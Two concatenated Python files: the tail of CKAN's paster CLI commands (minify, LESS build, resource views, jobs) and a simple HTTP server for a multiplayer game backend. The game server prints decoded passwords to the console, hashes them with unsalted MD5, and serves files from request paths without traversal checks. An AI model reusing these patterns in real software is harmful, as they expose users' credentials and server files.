translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
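# A sketch of the mangling applied to a hypothetical msgid: placeholders are
# preserved and every other character becomes '-', e.g.
#   msgid  "Hello %(name)s!"
#   msgstr "------%(name)s-"
# so untranslated strings stand out while format substitutions stay intact.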
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file nor a dir; nothing to do.
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minified.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
Note that in either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
Returns the view plugins that were successfully loaded
Views are provided as a list of ``view_plugin_types``. If no types are
provided, the default views defined in the ``ckan.views.default_views``
config option will be used. Only in this case (when the default view
plugins are used) can the ``get_datastore_views`` parameter be used to
also get view plugins that require data to be in the DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found: {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
This obviously should only be used if all view types are known and can
be filtered, otherwise we want all datasets to be returned. If a
non-filterable view type is provided, the search params are not
modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
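# A sketch of the filter added for a hypothetical call with
# view_types=['pdf_view']: fq_list gains a single entry,
#   '+res_format:"pdf" OR +res_format:"PDF"'
# so package_search only returns datasets with at least one PDF resource.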
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object cannot be parsed, the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError, e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
if (user_search_params.get('fq_list') and
isinstance(user_search_params['fq_list'], list)):
search_data_dict['fq_list'].extend(user_search_params['fq_list'])
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
print 'This command will delete the following resource views:\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
error(e)
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
to the default queue; this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
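# A sketch of a hypothetical invocation of the test sub-command:
#   $ paster jobs test default priority
#   Added test job <job id> to queue "default"
#   Added test job <job id> to queue "priority"
# One test job is enqueued per named queue (or just the default queue when
# no names are given).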
|
simple_http_server.py
|
'''
Simple HTTP Server
Copyright 2018 Jacques Gasselin
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import http
import http.server
import uuid
import urllib.parse
import json
import sys
import os
class HttpAuthException(Exception):
pass
class ServerInstance(object):
def __init__(self, db):
self.__db = db
self.__db.open()
def close(self):
self.__db.close()
def connect(self, handler, game):
print("CONNECT game %s" % game)
connectionUUID = self.__db.connect(handler.client_address[0], game)
return { "connectionToken" : str(connectionUUID) }
def login(self, handler, connection, localDevice):
print("LOGIN connection %s on device %s " % (connection, localDevice))
localPlayer = self.__db.login(connection, localDevice)
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
authenticated = self.__db.isLocalPlayerAuthenticated(connection, localPlayer)
return { "localPlayerToken" : str(localPlayer),
"displayName" : str(displayName),
"friendCode" : str(friendCode),
"authenticated" : 1 if authenticated else 0}
def httpauthenticate(self, handler, connection, localPlayer):
if not 'Authorization' in handler.headers:
raise HttpAuthException()
auth = handler.headers['Authorization']
import base64
auth_type, auth_bytes = auth.split(" ")
username, password = base64.standard_b64decode(auth_bytes.encode()).decode().split(":")
print("username:", username)
print("password:", password)
import hashlib
md5 = hashlib.md5()
md5.update(username.encode())
md5.update(b':')
md5.update(password.encode())
if self.__db.authenticateLocalPlayer(connection, localPlayer, "HTTP " + auth_type, username, md5.hexdigest()):
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
authenticated = self.__db.isLocalPlayerAuthenticated(connection, localPlayer)
return { "localPlayerToken" : str(localPlayer),
"displayName" : str(displayName),
"friendCode" : str(friendCode),
"authenticated" : 1 if authenticated else 0}
return { "localPlayerToken" : "",
"displayName" : "",
"friendCode" : "",
"authenticated" : 0 }
def writeplayerdata(self, handler, connection, localPlayer, data):
print("WRITE PLAYER DATA '%s' FOR player %s ON connection %s " % (str(data), localPlayer, connection))
success = self.__db.writePlayerData(connection, localPlayer, data)
return "1".encode() if success else "0".encode()
def readplayerdata(self, handler, connection, localPlayer, data = None):
print("READ PLAYER DATA FOR player %s ON connection %s " % (localPlayer, connection))
data = self.__db.readPlayerData(connection, localPlayer)
return data
def writeplayerdisplayname(self, handler, connection, localPlayer, displayName):
print("WRITE displayName '%s' FOR player %s ON connection %s " % (displayName, localPlayer, connection))
success = self.__db.setPlayerDisplayName(connection, localPlayer, displayName)
return { "status" : 1 if success else 0 }
def readplayerdisplayname(self, handler, connection, localPlayer, displayName = None):
print("READ displayName FOR player %s ON connection %s " % (localPlayer, connection))
displayName = self.__db.getPlayerDisplayName(connection, localPlayer)
return { "displayName" : str(displayName) }
def readplayerfriendcode(self, handler, connection, localPlayer):
print("READ friendCode for player %s ON connection %s " % (localPlayer, connection))
friendCode = self.__db.getPlayerFriendCode(connection, localPlayer)
return { "friendCode" : str(friendCode) }
def addplayerfriend(self, handler, connection, localPlayer, friendCode):
print("ADD friend with friendCode %s to player %s ON connection %s " % (friendCode, localPlayer, connection))
success = self.__db.addFriendToLocalPlayer(connection, localPlayer, friendCode)
return { "status" : 1 if success else 0 }
def listplayerfriends(self, handler, connection, localPlayer):
print("LIST friends for player %s ON connection %s " % (localPlayer, connection))
friendsAndNames = self.__db.listPlayerFriends(connection, localPlayer)
friends = [{ 'remotePlayerToken' : str(s), 'displayName' : n} for s, n in friendsAndNames]
return { "friends" : friends }
def createsession(self, handler, connection, localPlayer, displayName=None):
print("CREATE session '%s' FOR player %s ON connection %s " % (displayName if displayName else "<auto>", localPlayer, connection))
localSessionUUID = self.__db.createSession(connection, localPlayer, displayName)
displayName = self.__db.getSessionDisplayName(connection, localSessionUUID)
shareCode = self.__db.getSessionShareCode(connection, localSessionUUID)
return { "localSessionToken" : str(localSessionUUID), "displayName" : displayName, "shareCode" : shareCode }
def joinsession(self, handler, connection, localPlayer, sessionCode):
print("JOIN session '%s' FOR player %s ON connection %s " % (sessionCode, localPlayer, connection))
localSessionUUID = self.__db.joinSession(connection, localPlayer, sessionCode)
displayName = self.__db.getSessionDisplayName(connection, localSessionUUID)
shareCode = self.__db.getSessionShareCode(connection, localSessionUUID)
return { "localSessionToken" : str(localSessionUUID), "displayName" : displayName, "shareCode" : shareCode }
def leavesession(self, handler, connection, localPlayer, session):
print("LEAVE session '%s' FOR player %s ON connection %s " % (session, localPlayer, connection))
success = self.__db.leaveSession(connection, localPlayer, session)
return { "status" : 1 if success else 0 }
def writesessiondata(self, handler, connection, session, data):
print("WRITE SESSION DATA '%s' FOR session %s ON connection %s " % (str(data), session, connection))
success = self.__db.writeSessionData(connection, session, data)
return "1".encode() if success else "0".encode()
def readsessiondata(self, handler, connection, session):
print("READ SESSION DATA FOR session %s ON connection %s " % (session, connection))
data = self.__db.readSessionData(connection, session)
return data
def readsessiondisplayname(self, handler, connection, session):
print("READ displayName FOR session %s ON connection %s " % (session, connection))
displayName = self.__db.getSessionDisplayName(connection, session)
return { "displayName" : str(displayName) }
def writesessiondisplayname(self, handler, connection, session, displayName):
print("WRITE displayName '%s' FOR session %s ON connection %s " % (displayName, session, connection))
success = self.__db.setSessionDisplayName(connection, session, displayName)
return { "status" : 1 if success else 0 }
def listsessionplayers(self, handler, connection, session):
print("LIST players for session %s ON connection %s " % (session, connection))
players = self.__db.listSessionPlayers(connection, session)
return { "players" : players }
def listplayersessions(self, handler, connection, localPlayer):
print("LIST sessions for player %s ON connection %s " % (localPlayer, connection))
sessionsNamesAndCodes = self.__db.listPlayerSessions(connection, localPlayer)
sessions = [{ 'localSessionToken' : str(s), 'displayName' : n, 'shareCode' : c } for s, n, c in sessionsNamesAndCodes]
return { "sessions" : sessions }
class PickleServerInstance(ServerInstance):
def __init__(self):
dbPath = os.path.expanduser("~/.multiplay-pickle.db")
print("loading backend from ", dbPath)
from backend import PickleBackend as Backend
ServerInstance.__init__(self, Backend(dbPath))
class Sqlite3ServerInstance(ServerInstance):
def __init__(self):
dbPath = os.path.expanduser("~/.multiplay-sqlite3.db")
print("loading backend from ", dbPath)
from backend import Sqlite3Backend as Backend
ServerInstance.__init__(self, Backend(dbPath))
class RequestHandler(http.server.BaseHTTPRequestHandler):
serverInstance = None
def _parse_GET(self):
if '?' in self.path:
command, argumentString = self.path.split("?")
else:
command = self.path
argumentString = ""
argumentValueByName = {}
if len(argumentString) > 0:
arguments = argumentString.split("&")
for arg in arguments:
try:
name, value = arg.split("=")
except ValueError:
name = arg
value = ""
argumentValueByName[name] = urllib.parse.unquote_plus(value)
command, format = os.path.splitext(command)
if format:
argumentValueByName['response'] = format[1:]
return command.lower(), argumentValueByName
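    # Illustrative request shape (the query parameter names mirror the ServerInstance
    # method signatures above; the values are placeholders):
    #   GET /listplayerfriends.json?connection=<token>&localPlayer=<token>
    # _parse_GET splits this into the command "/listplayerfriends", the response format
    # "json" (taken from the path extension), and the remaining query arguments, which
    # do_GET later forwards as keyword arguments to the matching ServerInstance method.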
def _write_content(self, content):
if content:
if len(content) >= 128: # Pick some value for which gzip is worth it
if 'Accept-Encoding' in self.headers:
if 'gzip' in self.headers['Accept-Encoding']:
import gzip
content = gzip.compress(content)
self.send_header('Content-Encoding', 'gzip')
self.send_header('Content-Length', str(len(content)))
# CORS support
self.send_header('Access-Control-Allow-Origin', "*")
self.end_headers()
self.wfile.write(content)
else:
self.end_headers()
def _GET_json(self, response):
if isinstance(response, bytes):
try:
rstr = response.decode().strip()
response = json.loads(rstr)
except json.decoder.JSONDecodeError as e:
self.send_response(400)
self.end_headers()
self.wfile.write(str(e).encode())
self.wfile.write('\n'.encode())
self.wfile.write(response)
return
self.send_response(200)
self.send_header("Content-type", "application/json")
content = ("%s\n" % json.dumps(response)).encode()
self._write_content(content)
def _GET_html(self, response):
self.send_response(200)
self.send_header("Content-type", "text/html")
self._write_content(response.encode())
def _GET_binary(self, response):
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self._write_content(response)
def _respond_error(self, code, error, format="json"):
if format == "json":
self.send_response(code)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(('{ "error" : "%s" }\n' % str(error)).encode())
else:
self.send_response(code)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(('error=%s\n' % str(error)).encode())
def _GET_www_resource(self):
rootPath = self.server.site_root_path
if '?' in self.path:
path, argumentString = self.path.split("?")
else:
path = self.path
argumentString = ""
# path has a prefix of / which would fail os.path.join
filePath = os.path.join(rootPath, path[1:])
try:
with open(filePath, "rb") as f:
data = f.read()
self.send_response(200)
if path.endswith(".html"):
self.send_header("Content-type", "text/html")
elif path.endswith(".css"):
self.send_header("Content-type", "text/css")
elif path.endswith(".js"):
self.send_header("Content-type", "application/javascript")
elif path.endswith(".png"):
self.send_header("Content-type", "image/png")
elif path.endswith(".ico"):
self.send_header("Content-type", "image/x-icon")
self._write_content(data)
except FileNotFoundError as e:
self.send_response(400)
self.end_headers()
self.wfile.write(str(e).encode())
def do_GET(self):
print("GET")
try:
command, argumentValueByName = self._parse_GET()
except ValueError as e:
self._respond_error(400, e)
return
format = argumentValueByName.pop("response", "binary")
instance = RequestHandler.serverInstance
try:
func = getattr(instance, command[1:])
except AttributeError as e:
self._GET_www_resource()
return
try:
response = func(self, **argumentValueByName)
print("-> ", response)
except HttpAuthException as e:
self.send_response(401)
self.send_header("WWW-Authenticate", 'Basic realm="multiplay"')
self.end_headers()
self.wfile.write(str("0").encode())
return
except TypeError as e:
self._respond_error(400, e, format)
return
except ValueError as e:
self._respond_error(400, e, format)
return
try:
if format == "html":
self._GET_html(response)
            elif format == "ico":
                # No _GET_ico formatter is defined in this handler; serve as raw bytes.
                self._GET_binary(response)
elif format == "json":
self._GET_json(response)
else:
self._GET_binary(response)
except TypeError as e:
print(e)
self._respond_error(400, e, format)
    def do_POST(self):
        print("POST")
        self.send_response(501)  # POST is not implemented yet
        self.end_headers()
__httpd = None
def run(port, useSSL = False):
__serverInstanceClass = Sqlite3ServerInstance
if 'pickle' in sys.argv:
__serverInstanceClass = PickleServerInstance
RequestHandler.serverInstance = __serverInstanceClass()
server_address = ('', port)
try:
with http.server.ThreadingHTTPServer(server_address, RequestHandler) as httpd:
global __httpd
            if useSSL:
                import ssl
                # openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
                # ssl.wrap_socket() is deprecated (removed in Python 3.12); use an SSLContext.
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                context.load_cert_chain(
                    certfile=os.path.expanduser('~/.ssh/multiplay-server-cert.pem'),
                    keyfile=os.path.expanduser('~/.ssh/multiplay-server-key.pem'))
                httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
print("serving at https://", httpd.server_address)
else:
print("serving at http://localhost:%i" % port)
print("API test at http://localhost:%i/application/test.html" % port)
print("chat client at http://localhost:%i/application/chat.html" % port)
print("tictactoe at http://localhost:%i/application/tictactoe.html" % port)
__httpd = httpd
currentFilePath = os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))
httpd.site_root_path = os.path.realpath(os.path.join(currentFilePath, '..', '..', '..', 'www'))
print("loading resources from ", httpd.site_root_path)
httpd.serve_forever()
